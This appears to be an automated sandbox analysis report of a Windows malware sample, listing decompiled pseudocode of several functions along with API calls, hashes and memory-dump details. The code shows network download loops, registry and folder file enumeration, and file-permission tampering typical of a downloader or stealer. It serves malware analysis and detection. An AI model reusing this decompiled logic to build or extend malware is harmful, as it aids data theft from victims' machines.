Instruction ID: afa41e4b25c1fd39c5fc92f4fab930d1337b51f6ca3c5dc729ab851e3868f702
Opcode Fuzzy Hash: c67a114f76833c92d784cf3014efd3b0814f4007bf76bacdb640805016c5b1ac
Instruction Fuzzy Hash: 5E51F171204742ABD330CB65D840B67BBE4AF65300F04892EE9C7DBB91DB78E854C769

Uniqueness

Uniqueness Score: -1.00%

Function 0040E840, Relevance: 10.7, APIs: 7, Instructions: 165
memoryCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0040E840(void* __ecx, void* __edx, void* __eflags, void* _a4) {
				char _v680;
				char _v808;
				char _v1072;
				char _v1084;
				char* _v1088;
				long _v1092;
				char* _v1096;
				long _v1100;
				intOrPtr _v1104;
				intOrPtr _v1108;
				void* _v1112;
				void* _v1116;
				void* _v1120;
				char _v1124;
				char _v1128;
				void* _v1132;
				void* _v1136;
				void* _v1140;
				char _v1144;
				void* _v1148;
				void* __ebx;
				void* __edi;
				void* __esi;
				void _t47;
				void* _t50;
				signed int _t58;
				void _t62;
				void* _t84;
				void* _t90;
				void* _t101;
				void* _t104;
				void* _t108;
				void* _t110;
				void* _t112;

				_t97 = __edx;
				_t108 = E0041CDD0(__eflags, 0x8387a395, 2);
				_t47 = 0;
				_v1120 = _t108;
				if(_t108 != 0) {
					 *0x42d424 = 0;
					while(1) {
						__eflags = _t47;
						if(_t47 != 0) {
							goto L8;
						}
						_t90 = _a4;
						__eflags =  *((intOrPtr*)(_t90 + 0x1c)) - _t47;
						if( *((intOrPtr*)(_t90 + 0x1c)) != _t47) {
							__eflags =  *(_t90 + 0x14) - 0x40;
							if( *(_t90 + 0x14) >= 0x40) {
								_t101 = _t90 + 0x30;
								L9:
								_t97 =  *(_t90 + 0x14);
								_t50 = _t101 - _t90 + 0x10;
								__eflags = _t50 - _t97;
								if(_t50 <= _t97) {
									__eflags =  *((intOrPtr*)(_t101 + 8)) + _t50 - _t97;
									if( *((intOrPtr*)(_t101 + 8)) + _t50 <= _t97) {
										__eflags =  *((intOrPtr*)(_t101 + 0xc)) - 0x10;
										_v1120 = _t101;
										if( *((intOrPtr*)(_t101 + 0xc)) > 0x10) {
											_t84 = E00418C20(_t101);
											_v1132 = _t84;
											__eflags = _t84;
											if(_t84 != 0) {
												_push(_t84);
												_t58 = E0040E480(_t97) & 0x0000ffff;
												_v1132 = _t58;
												_v1128 = 0xffffffff;
												__eflags = _t58;
												if(_t58 == 0) {
													_t19 = _t84 + 0x10; // 0x10
													_t112 = E00410AA0(_t19, 0xfde9,  *((intOrPtr*)(_t101 + 0xc)) - 0x10);
													__eflags = _t112;
													if(_t112 != 0) {
														_t97 =  &_v1128;
														_v1136 = E0040E660(_t112,  &_v1128) & 0x0000ffff;
														HeapFree( *0x42e6d4, 0, _t112);
													} else {
														_v1132 = 0xc5;
													}
												}
												_t110 = E00423A90();
												__eflags = _t110;
												if(_t110 != 0) {
													_v1120 = 0;
													_t62 = E00418BD0(0x4e23, 0x10000000, _t110);
													__eflags = _t62;
													if(_t62 == 0) {
														_t104 = _v1120;
													} else {
														_t104 = E00418C20(_t62);
													}
													_t97 =  *0x42e6d4;
													HeapFree( *0x42e6d4, 0, _t110);
													__eflags = _t104;
													if(_t104 != 0) {
														__eflags =  *_t104;
														if( *_t104 != 0) {
															E0041D150( &_v808);
															E00410820( &_v1072,  &_v680, 0x102);
															_v1116 = _v1148;
															_v1124 = _v1144;
															_v1120 = _v1140;
															_push( &_v1112);
															_v1112 = _t104;
															_v1108 = E0040E2D0;
															_v1104 = E0040E470;
															_v1100 = 0;
															_v1096 =  &_v1084;
															_v1092 = 0;
															_v1088 =  &_v1124;
															E0040D4A0();
														}
														_t97 =  *0x42e6d4;
														HeapFree( *0x42e6d4, 0, _t104);
													}
													_t84 = _v1136;
												}
												HeapFree( *0x42e6d4, 0, _t84);
												_t108 = _v1116;
											}
										}
										_t47 = _v1120;
										continue;
									}
								}
							}
						}
						HeapFree( *0x42e6d4, 0, _t90);
						E0040E230(_t97);
						ReleaseMutex(_t108);
						CloseHandle(_t108);
						__eflags = 0;
						return 0;
						goto L28;
						L8:
						_t101 =  *((intOrPtr*)(_t47 + 8)) + _t47 + 0x10;
						_t90 = _a4;
						goto L9;
					}
				} else {
					return 1;
				}
				L28:
			}

0x0040e840
0x0040e85b
0x0040e85d
0x0040e85f
0x0040e865
0x0040e875
0x0040e884
0x0040e884
0x0040e886
0x00000000
0x00000000
0x0040e888
0x0040e88b
0x0040e88e
0x0040e894
0x0040e898
0x0040e89e
0x0040e8ad
0x0040e8ad
0x0040e8b4
0x0040e8b7
0x0040e8b9
0x0040e8c4
0x0040e8c6
0x0040e8cc
0x0040e8d0
0x0040e8d4
0x0040e8db
0x0040e8dd
0x0040e8e1
0x0040e8e3
0x0040e8e5
0x0040e8eb
0x0040e8ee
0x0040e8f2
0x0040e8fa
0x0040e8fd
0x0040e906
0x0040e913
0x0040e915
0x0040e917
0x0040e923
0x0040e93c
0x0040e940
0x0040e919
0x0040e919
0x0040e919
0x0040e917
0x0040e94b
0x0040e94d
0x0040e94f
0x0040e95f
0x0040e967
0x0040e96c
0x0040e96e
0x0040e97b
0x0040e970
0x0040e977
0x0040e977
0x0040e97f
0x0040e989
0x0040e98f
0x0040e991
0x0040e999
0x0040e99b
0x0040e9a4
0x0040e9bb
0x0040e9cd
0x0040e9d1
0x0040e9d6
0x0040e9e6
0x0040e9e7
0x0040e9eb
0x0040e9f3
0x0040e9fb
0x0040e9ff
0x0040ea03
0x0040ea07
0x0040ea0b
0x0040ea0b
0x0040ea10
0x0040ea19
0x0040ea19
0x0040ea1f
0x0040ea1f
0x0040ea2c
0x0040ea32
0x0040ea32
0x0040e8e3
0x0040e880
0x00000000
0x0040e880
0x0040e8c6
0x0040e8b9
0x0040e898
0x0040ea45
0x0040ea4b
0x0040ea51
0x0040ea58
0x0040ea60
0x0040ea66
0x00000000
0x0040e8a3
0x0040e8a6
0x0040e8aa
0x00000000
0x0040e8aa
0x0040e867
0x0040e872
0x0040e872
0x00000000

APIs

Part of subcall function 0041CDD0: CreateMutexW.KERNEL32(0042E930,00000000,?,?,?,?,?), ref: 0041CE18
Part of subcall function 0041CDD0: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041CE27
Part of subcall function 0041CDD0: CloseHandle.KERNEL32(00000000), ref: 0041CE39

HeapFree.KERNEL32(?,00000000,00000000), ref: 0040E989

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateFreeHandleHeapMutexObjectSingleWait
String ID:
API String ID: 1654186904-0
Opcode ID: f292e5b193641bfdc1c34acc1aedca85b5cd6b081b5f589da154883b10082ddc
Instruction ID: bbe094fab3c94494c41159912f04e2bdce726cc135ceb8da3176096c6eb6c179
Opcode Fuzzy Hash: f292e5b193641bfdc1c34acc1aedca85b5cd6b081b5f589da154883b10082ddc
Instruction Fuzzy Hash: BD51E4B16043419BC314EF66D880A5BB7E5BF88344F404D3EF984AB291D778D816CBDA

Uniqueness

Uniqueness Score: -1.00%

Function 0040D4A0, Relevance: 10.6, APIs: 7, Instructions: 125
networkmemorysleepCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040D4A0() {
				void* _t30;
				void* _t31;
				signed int _t36;
				signed char _t41;
				void* _t42;
				void* _t45;
				int _t47;
				void* _t49;
				intOrPtr _t55;
				void* _t64;
				void* _t67;
				intOrPtr* _t69;
				void* _t70;

				_t69 =  *((intOrPtr*)(_t70 + 0x2c));
				_t55 =  *((intOrPtr*)(_t69 + 0x14));
				 *((char*)(_t70 + 0x34)) = 0;
				if(E004173A0(_t70 + 0x20,  *_t69) == 0) {
					L28:
					 *((intOrPtr*)(_t69 + 0x14)) = _t55;
					return  *((intOrPtr*)(_t70 + 0x34));
				} else {
					if( *0x42eb6c == 0) {
						 *0x42eb6c = E00413580();
					}
					 *(_t70 + 0x17) = 0;
					while( *((char*)(_t70 + 0x34)) == 0) {
						if( *(_t70 + 0x17) <= 0) {
							L10:
							_t36 =  *(_t70 + 0x17) & 1;
							if(_t36 < 0) {
								_t36 = (_t36 - 0x00000001 | 0xfffffffe) + 1;
							}
							asm("sbb eax, eax");
							_t67 = E00412FC0( ~_t36 + 1,  *0x42eb6c,  *(_t70 + 0x20),  *((intOrPtr*)(_t70 + 0x2c)));
							if(_t67 == 0) {
								L23:
								_t41 =  *(_t70 + 0x17) + 1;
								 *(_t70 + 0x17) = _t41;
								if(_t41 < 5) {
									continue;
								}
								break;
							} else {
								_t64 = 0;
								_push(0);
								_push(_t69);
								_push(_t67);
								_t45 = E0040D360(_t55, _t70 + 0x2c);
								if(_t45 == 2) {
									L19:
									 *(_t70 + 0x28) = 0;
									 *((intOrPtr*)(_t70 + 0x2c)) = 4;
									_t47 = InternetQueryOptionA(_t67, 0x15, _t70 + 0x1c, _t70 + 0x1c);
									InternetCloseHandle(_t67);
									if(_t47 != 0) {
										_t49 =  *(_t70 + 0x18);
										if(_t49 != 0 &&  *(_t70 + 0x1c) == 4) {
											InternetCloseHandle(_t49);
										}
									}
									goto L23;
								}
								while(_t45 != 1) {
									_t64 = _t64 + 1;
									_push(_t64);
									_push(_t69);
									_push(_t67);
									_t45 = E0040D360(_t55, _t70 + 0x2c);
									if(_t45 != 2) {
										continue;
									}
									goto L19;
								}
								 *((char*)(_t70 + 0x34)) = 1;
								goto L19;
							}
						}
						_t42 =  *(_t69 + 0xc);
						_push(0x1388);
						if(_t42 == 0) {
							Sleep();
							goto L10;
						}
						if(WaitForSingleObject(_t42, ??) != 0x102) {
							break;
						}
						goto L10;
					}
					_t30 =  *(_t70 + 0x20);
					if(_t30 != 0) {
						HeapFree( *0x42e6d4, 0, _t30);
					}
					_t31 =  *(_t70 + 0x24);
					if(_t31 != 0) {
						HeapFree( *0x42e6d4, 0, _t31);
					}
					goto L28;
				}
			}

0x0040d4a5
0x0040d4ac
0x0040d4b5
0x0040d4c1
0x0040d603
0x0040d609
0x0040d611
0x0040d4c7
0x0040d4ce
0x0040d4d5
0x0040d4d5
0x0040d4da
0x0040d4df
0x0040d4ef
0x0040d517
0x0040d51c
0x0040d521
0x0040d527
0x0040d527
0x0040d539
0x0040d542
0x0040d546
0x0040d5c4
0x0040d5c8
0x0040d5ca
0x0040d5d0
0x00000000
0x00000000
0x00000000
0x0040d548
0x0040d548
0x0040d54a
0x0040d54b
0x0040d54c
0x0040d553
0x0040d55b
0x0040d580
0x0040d58d
0x0040d595
0x0040d59d
0x0040d5ac
0x0040d5b0
0x0040d5b2
0x0040d5b8
0x0040d5c2
0x0040d5c2
0x0040d5b8
0x00000000
0x0040d5b0
0x0040d560
0x0040d565
0x0040d566
0x0040d567
0x0040d568
0x0040d56f
0x0040d577
0x00000000
0x00000000
0x00000000
0x0040d579
0x0040d57b
0x00000000
0x0040d57b
0x0040d546
0x0040d4f1
0x0040d4f4
0x0040d4fb
0x0040d511
0x00000000
0x0040d511
0x0040d509
0x00000000
0x00000000
0x00000000
0x0040d50f
0x0040d5d6
0x0040d5e2
0x0040d5ee
0x0040d5ee
0x0040d5f0
0x0040d5f6
0x0040d601
0x0040d601
0x00000000
0x0040d5f6

APIs

Part of subcall function 004173A0: InternetCrackUrlA.WININET(?,00000000,00000000), ref: 004173D7

WaitForSingleObject.KERNEL32(?,00001388), ref: 0040D4FE
Sleep.KERNEL32(00001388), ref: 0040D511
InternetQueryOptionA.WININET(00000000,00000015,?,?), ref: 0040D59D
InternetCloseHandle.WININET(00000000), ref: 0040D5AC
InternetCloseHandle.WININET(?), ref: 0040D5C2
HeapFree.KERNEL32(?,00000000,?), ref: 0040D5EE
HeapFree.KERNEL32(?,00000000,?), ref: 0040D601

Part of subcall function 00413580: LoadLibraryA.KERNEL32(urlmon.dll,?,?), ref: 0041358F
Part of subcall function 00413580: GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 004135A5
Part of subcall function 00413580: FreeLibrary.KERNEL32(00000000), ref: 00413605

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$Free$CloseHandleHeapLibrary$AddressCrackLoadObjectOptionProcQuerySingleSleepWait
String ID:
API String ID: 2632256483-0
Opcode ID: a691918fa853fe8352daf15c35d4ce3b320cfd7eea674cf944e8dde1066852d6
Instruction ID: cba55708ce18109a4cdb01303e2cd6a308a4523a4e1c7b4f716367dd3363b6e5
Opcode Fuzzy Hash: a691918fa853fe8352daf15c35d4ce3b320cfd7eea674cf944e8dde1066852d6
Instruction Fuzzy Hash: ED416531A04244AFD720DB69CC44B6B7BE8AB99708F14492FF845E32D0D638DD49CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 004215B0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121
memoryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E004215B0(void* __eflags) {
				char _v660;
				short _v1180;
				short _v1700;
				void* _v1712;
				char _v1720;
				char _v1764;
				char _v1776;
				char _v1800;
				intOrPtr _v1820;
				intOrPtr _v1824;
				char _v1828;
				intOrPtr _v1832;
				char _v1836;
				intOrPtr _v1840;
				void* _v1844;
				char _v1852;
				intOrPtr _v1860;
				char _v1864;
				void* __esi;
				void* _t34;
				void* _t35;
				void* _t70;
				intOrPtr* _t71;
				char* _t75;
				signed int _t76;
				char* _t77;
				void** _t78;
				intOrPtr _t85;

				_t78 =  &_v1844;
				E00410870( &_v1844,  &_v1844, 0, 8);
				E00424100(0x77,  &_v1764);
				E00424100(0x78,  &_v1828);
				_t34 = E00416420(0x80000001,  &_v1764,  &_v1828, 0x104);
				if(_t34 != 0xffffffff && _t34 != 0) {
					ExpandEnvironmentStringsW( &_v1700,  &_v1180, 0x104);
					_t77 =  &_v1800;
					E00424100(0x71, _t77);
					_v1836 = _t77;
					E00418700( &_v1180,  &_v1836, 1, 5, E00421310,  &_v1844, 0, 0, 0);
				}
				if(_v1840 == 0) {
					_t75 =  &_v1776;
					E00424100(0x79, _t75);
					_t71 = __imp__SHGetFolderPathW;
					_v1828 = 0x1a;
					_v1824 = 0x26;
					_v1820 = 0x23;
					_v1832 = _t75;
					_t76 = 0;
					do {
						_push( &_v1700);
						_push(0);
						_push(0);
						_push( *((intOrPtr*)(_t78 + 0x18 + _t76 * 4)));
						_push(0);
						if( *_t71() == 0) {
							E00418700( &_v1720,  &_v1852, 1, 2, E00421310,  &_v1864, _t44, _t44, _t44);
						}
						_t76 = _t76 + 1;
					} while (_t76 < 3);
					_t85 = _v1860;
				}
				_t35 = _v1844;
				if(_t85 <= 0) {
					if(_t35 != 0) {
						return HeapFree( *0x42e6d4, 0, _t35);
					}
					goto L16;
				} else {
					_t70 = _t35;
					if(_t35 == 0) {
						L16:
						return _t35;
					} else {
						if( *_t35 != 0) {
							E00424100(0x7a,  &_v660);
							E0040D880(_t70, 0xcb,  &_v660);
						}
						return HeapFree( *0x42e6d4, 0, _t70);
					}
				}
			}

0x004215b0
0x004215c1
0x004215cf
0x004215dd
0x004215fb
0x00421603
0x0042161e
0x00421624
0x0042162d
0x00421646
0x00421657
0x00421657
0x00421661
0x00421667
0x00421670
0x00421675
0x0042167d
0x00421685
0x0042168d
0x00421695
0x00421699
0x004216a0
0x004216ab
0x004216ac
0x004216ae
0x004216b0
0x004216b1
0x004216b7
0x004216d5
0x004216d5
0x004216da
0x004216db
0x004216e0
0x004216e0
0x004216e5
0x004216e9
0x00421731
0x00000000
0x0042173d
0x00000000
0x004216eb
0x004216eb
0x004216ef
0x0042174b
0x0042174b
0x004216f1
0x004216f5
0x00421703
0x00421712
0x00421712
0x0042172e
0x0042172e
0x004216ef

APIs

Part of subcall function 00416420: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000001,00000000,?,00000000,00000000,?,004106E6,?,?,00000104,?,00000000), ref: 00416448
Part of subcall function 00416420: RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00416469
Part of subcall function 00416420: RegCloseKey.ADVAPI32(?,?,00000000), ref: 0041647B

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,00000000,00000000,00000008,?,00000000), ref: 0042161E

Part of subcall function 00418700: PathCombineW.SHLWAPI(?,?,0040365E,?,00000000), ref: 0041873C
Part of subcall function 00418700: FindFirstFileW.KERNEL32(?,?,?,00000000), ref: 00418757
Part of subcall function 00418700: WaitForSingleObject.KERNEL32(00000000,00000000,?,00000000), ref: 00418777
Part of subcall function 00418700: PathMatchSpecW.SHLWAPI(?), ref: 004187DD
Part of subcall function 00418700: PathCombineW.SHLWAPI(?,?,0000002C), ref: 00418844

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 004216B3
HeapFree.KERNEL32(?,00000000,?,?,?,00000104,00000000,00000000), ref: 00421720

Strings

&, xrefs: 00421685
#, xrefs: 0042168D

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Path$Combine$CloseEnvironmentExpandFileFindFirstFolderFreeHeapMatchObjectOpenQuerySingleSpecStringsValueWait
String ID: #$&
API String ID: 2302067336-3870246384
Opcode ID: 257ebb35da3145f9f30ba44be4ebc822457156ad565f95c58b1e28ee01885c8a
Instruction ID: 529c89069b48fbad7a1370ad3f9cada1e1cb8e9a2cab55626a055c3d4dc76843
Opcode Fuzzy Hash: 257ebb35da3145f9f30ba44be4ebc822457156ad565f95c58b1e28ee01885c8a
Instruction Fuzzy Hash: 2841D6317443106FE724DB11EC45FAB77A8EBD4704F80481EF685972D0DBB8A945CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C490, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040C490(WCHAR* __edi, void* __esi, char _a4) {
				WCHAR* _v0;
				WCHAR* _v16;
				char _v20;
				int _v24;
				int _v28;
				struct _SECURITY_DESCRIPTOR* _v32;
				struct _ACL* _v36;
				char _v672;
				char _v800;
				char _v1064;
				char _v1134;
				intOrPtr _v1166;
				char _v1564;
				short _v1656;
				long _t31;
				WCHAR* _t34;
				int _t37;
				WCHAR* _t39;
				signed int _t40;
				void* _t42;
				int _t50;
				signed int _t52;
				signed int _t53;
				void* _t55;
				signed int _t56;
				WCHAR* _t57;
				void* _t58;
				struct _ACL* _t59;
				WCHAR* _t68;
				WCHAR* _t75;
				void* _t80;
				void* _t81;

				_t75 = __edi;
				_t81 = _t80 - 0x67c;
				if( *0x42d4f8 == 0) {
					 *0x42d4f8 = 0;
					E0041D150( &_v800);
					E00410820( &_v1064,  &_v672, 0x102);
					E00412640( &_v1064, E00410820( &_v1564, 0x42eb80, 0x1e6), 0x1e6);
					_t50 = 0;
					if(_v1166 != 0) {
						do {
							_t50 = _t50 + 1;
						} while ( *((char*)(_t81 + _t50 + 0x212)) != 0);
					}
					_t52 = MultiByteToWideChar(0, 0,  &_v1134, _t50,  &_v1656, 0x32);
					if(_t52 >= 0x32) {
						_t52 = 0;
					}
					 *((short*)(_t81 + 8 + _t52 * 2)) = 0;
					if(_t52 != 0) {
						_t68 =  &_v1656;
						while(1) {
							_t56 =  *_t68 & 0x0000ffff;
							if(_t56 != 0x5c && _t56 != 0x2f) {
								break;
							}
							_t68 =  &(_t68[1]);
						}
						_t57 = PathCombineW(0x42d4f8, 0x42e958, _t68);
						__eflags = _t57;
						if(_t57 == 0) {
							__eflags = 0;
							 *0x42d4f8 = 0;
						}
					}
					_t53 = 0;
					__eflags =  *0x42d4f8 - _t53; // 0x0
					if(__eflags != 0) {
						do {
							_t53 = _t53 + 1;
							__eflags = 0x42d4f8[_t53];
						} while (0x42d4f8[_t53] != 0);
					}
					_t55 = E00410820(0x42d700, 0x42d4f8, _t53 + _t53);
					__eflags = 0;
					 *((short*)(_t55 + 0x42d700)) = 0;
					_t31 = PathRemoveFileSpecW(0x42d700);
				}
				__eflags = _t75;
				if(_t75 != 0) {
					_t40 = 0;
					__eflags =  *0x42d4f8 - _t40; // 0x0
					if(__eflags != 0) {
						do {
							_t40 = _t40 + 1;
							__eflags = 0x42d4f8[_t40];
						} while (0x42d4f8[_t40] != 0);
					}
					_t42 = E00410820(_t75, 0x42d4f8, _t40 + _t40);
					__eflags = 0;
					 *((short*)(_t42 + _t75)) = 0;
					_t31 = PathRenameExtensionW(_t75, L".tmp");
				}
				__eflags = _a4;
				if(_a4 == 0) {
					L24:
					return _t31;
				} else {
					__eflags =  *0x42eb64 - 1;
					if( *0x42eb64 <= 1) {
						goto L24;
					} else {
						E00418550(0x42d700);
						_push(0x42d700);
						L25();
						_t31 = GetFileAttributesW(0x42d4f8);
						__eflags = _t31 - 0xffffffff;
						if(_t31 == 0xffffffff) {
							goto L24;
						} else {
							_v0 = 0x42d4f8;
							_t59 = 0;
							E004129B0(L"SeSecurityPrivilege");
							_t34 =  &_v20;
							__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;CIOI;NRNWNX;;;LW)", 1, _t34, 0, _t58);
							__eflags = _t34;
							if(_t34 != 0) {
								_v36 = 0;
								_t37 = GetSecurityDescriptorSacl(_v32,  &_v24,  &_v36,  &_v28);
								__eflags = _t37;
								if(_t37 != 0) {
									_t39 = _v16;
									__imp__SetNamedSecurityInfoW(_t39, 1, 0x10, 0, 0, 0, _v36);
									__eflags = _t39;
									if(_t39 == 0) {
										_t59 = 1;
									}
								}
								LocalFree(_v32);
							}
							return _t59;
						}
					}
				}
			}

0x0040c490
0x0040c490
0x0040c49f
0x0040c4a7
0x0040c4b4
0x0040c4ce
0x0040c4f1
0x0040c4f6
0x0040c4ff
0x0040c501
0x0040c501
0x0040c502
0x0040c501
0x0040c520
0x0040c529
0x0040c52b
0x0040c52b
0x0040c52f
0x0040c536
0x0040c538
0x0040c540
0x0040c540
0x0040c546
0x00000000
0x00000000
0x0040c54d
0x0040c54d
0x0040c55d
0x0040c563
0x0040c565
0x0040c567
0x0040c569
0x0040c569
0x0040c565
0x0040c570
0x0040c572
0x0040c579
0x0040c580
0x0040c580
0x0040c581
0x0040c581
0x0040c580
0x0040c599
0x0040c59e
0x0040c5a5
0x0040c5ac
0x0040c5ac
0x0040c5b2
0x0040c5b4
0x0040c5b6
0x0040c5b8
0x0040c5bf
0x0040c5c1
0x0040c5c1
0x0040c5c2
0x0040c5c2
0x0040c5c1
0x0040c5d6
0x0040c5e0
0x0040c5e3
0x0040c5e7
0x0040c5e7
0x0040c5ed
0x0040c5f5
0x0040c638
0x0040c63f
0x0040c5f7
0x0040c5f7
0x0040c5fe
0x00000000
0x0040c600
0x0040c605
0x0040c60a
0x0040c60f
0x0040c619
0x0040c61f
0x0040c622
0x00000000
0x0040c624
0x0040c62b
0x004155d9
0x004155db
0x004155e1
0x004155ed
0x004155f3
0x004155f5
0x0041560b
0x0041560f
0x00415615
0x00415617
0x0041561d
0x0041562a
0x00415630
0x00415632
0x00415634
0x00415634
0x00415632
0x0041563b
0x0041563b
0x00415647
0x00415647
0x0040c622
0x0040c5fe

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000032,00000000,000001E6,?,0042EB80,000001E6,?,?,00000102,00000000), ref: 0040C520
PathCombineW.SHLWAPI(0042D4F8,0042E958,?), ref: 0040C55D
PathRemoveFileSpecW.SHLWAPI(0042D700,0042D700,0042D4F8,00000000), ref: 0040C5AC
PathRenameExtensionW.SHLWAPI(-00000001,.tmp,-00000001,0042D4F8,00000000,00000000), ref: 0040C5E7
GetFileAttributesW.KERNEL32(0042D4F8,0042D700,0042D700), ref: 0040C619

Strings

.tmp, xrefs: 0040C5DB

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Path$File$AttributesByteCharCombineExtensionMultiRemoveRenameSpecWide
String ID: .tmp
API String ID: 818041824-2986845003
Opcode ID: 8c7bba708fae7dfad544b445b507d7f77c94fd5acb9d89d60e018daefddf60cf
Instruction ID: e4e57dbdfb65924a6dabcaff6c63d5dc16d0c4cfd39cff38348e401230c4bf60
Opcode Fuzzy Hash: 8c7bba708fae7dfad544b445b507d7f77c94fd5acb9d89d60e018daefddf60cf
Instruction Fuzzy Hash: 0D41D774A44320B9D324B734DC86BAB32A59B94704F604A3FF455E61F0E6B875C5826E

Uniqueness

Uniqueness Score: -1.00%

Function 00413180, Relevance: 10.6, APIs: 7, Instructions: 111
memoryfilesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00413180(void* _a4, intOrPtr _a12, void* _a16) {
				long _v4;
				void** _v8;
				intOrPtr _v20;
				intOrPtr _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t24;
				void** _t25;
				void* _t44;
				void* _t49;

				_t14 = _a12;
				if(_t14 == 0 || _t14 > 0xa00000) {
					_a12 = 0xa00000;
				}
				_t44 = 0;
				_t49 = 0;
				while(1) {
					_t15 = _a16;
					if(_t15 != 0 && WaitForSingleObject(_t15, 0) != 0x102) {
						break;
					}
					_t4 = _t44 + 0x1000; // 0x1000
					_t16 = _t4;
					_v4 = 0x1000;
					if(_t16 != 0) {
						_push(_t16 + 4);
						if(_t49 != 0) {
							_t18 = HeapReAlloc( *0x42e6d4, 8, _t49, ??);
						} else {
							_t18 = HeapAlloc( *0x42e6d4, 8, ??);
						}
						if(_t18 == 0) {
							break;
						} else {
							_t49 = _t18;
							goto L15;
						}
					} else {
						if(_t49 != 0) {
							HeapFree( *0x42e6d4, _t16, _t49);
						}
						_t49 = 0;
						L15:
						if(InternetReadFile(_a4, _t49 + _t44, _v4,  &_v4) == 0) {
							break;
						} else {
							_t24 = _v20;
							if(_t24 == 0) {
								_t25 = _v8;
								if(_t25 == 0) {
									if(_t49 != 0) {
										HeapFree( *0x42e6d4, 0, _t49);
									}
									return 1;
								} else {
									_t25[1] = _t44;
									 *_t25 = _t49;
									return 1;
								}
							} else {
								_t44 = _t44 + _t24;
								if(_t44 <= _v4) {
									continue;
								} else {
									break;
								}
							}
						}
					}
					L26:
				}
				if(_t49 != 0) {
					HeapFree( *0x42e6d4, 0, _t49);
				}
				return 0;
				goto L26;
			}

0x00413181
0x00413187
0x00413190
0x00413190
0x004131a8
0x004131aa
0x004131b0
0x004131b0
0x004131b6
0x00000000
0x00000000
0x004131cc
0x004131cc
0x004131d2
0x004131dc
0x004131f3
0x004131f6
0x00413213
0x004131f8
0x00413201
0x00413201
0x0041321b
0x00000000
0x0041321d
0x0041321d
0x00000000
0x0041321d
0x004131de
0x004131e0
0x004131ea
0x004131ea
0x004131ec
0x0041321f
0x00413236
0x00000000
0x00413238
0x00413238
0x0041323e
0x00413266
0x0041326c
0x0041327f
0x0041328b
0x0041328b
0x00413294
0x0041326e
0x0041326e
0x00413272
0x0041327a
0x0041327a
0x00413240
0x00413240
0x00413246
0x00000000
0x00000000
0x00000000
0x00000000
0x00413246
0x0041323e
0x00413236
0x00000000
0x004131dc
0x0041324e
0x0041325a
0x0041325a
0x00413263
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,00000000,00000000,?,?,?,?,0040D43D,00000000,?,00000000,?,?,?,?,00000000), ref: 004131BB
HeapFree.KERNEL32(?,00001000,00000000,00000000,?,?,?,?,0040D43D,00000000,?,00000000,?,?,?), ref: 004131EA
HeapAlloc.KERNEL32(?,00000008,00000FFC,00000000,?,?,?,?,0040D43D,00000000,?,00000000,?,?,?), ref: 00413201
HeapReAlloc.KERNEL32(?,00000008,00000000,00000FFC,00000000,?,?,?,?,0040D43D,00000000,?,00000000,?,?,?), ref: 00413213
InternetReadFile.WININET(?,?,00001000,00001000), ref: 00413232
HeapFree.KERNEL32(?,00000000,00000000,?,00000000,?,00000001,?), ref: 0041325A
HeapFree.KERNEL32(?,00000000,00000000,?,00001000,00001000,?,00000000,?,00000001,?), ref: 0041328B

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$Alloc$FileInternetObjectReadSingleWait
String ID:
API String ID: 2060653657-0
Opcode ID: a63dca9bc62d992b501af83569d4c70c2cc26be05c2863c513a8ed949bb476ff
Instruction ID: 6edeb96ccb4289ae3f40e531dace3e01eedc329a036e8ab75c038a7c9d98eee6
Opcode Fuzzy Hash: a63dca9bc62d992b501af83569d4c70c2cc26be05c2863c513a8ed949bb476ff
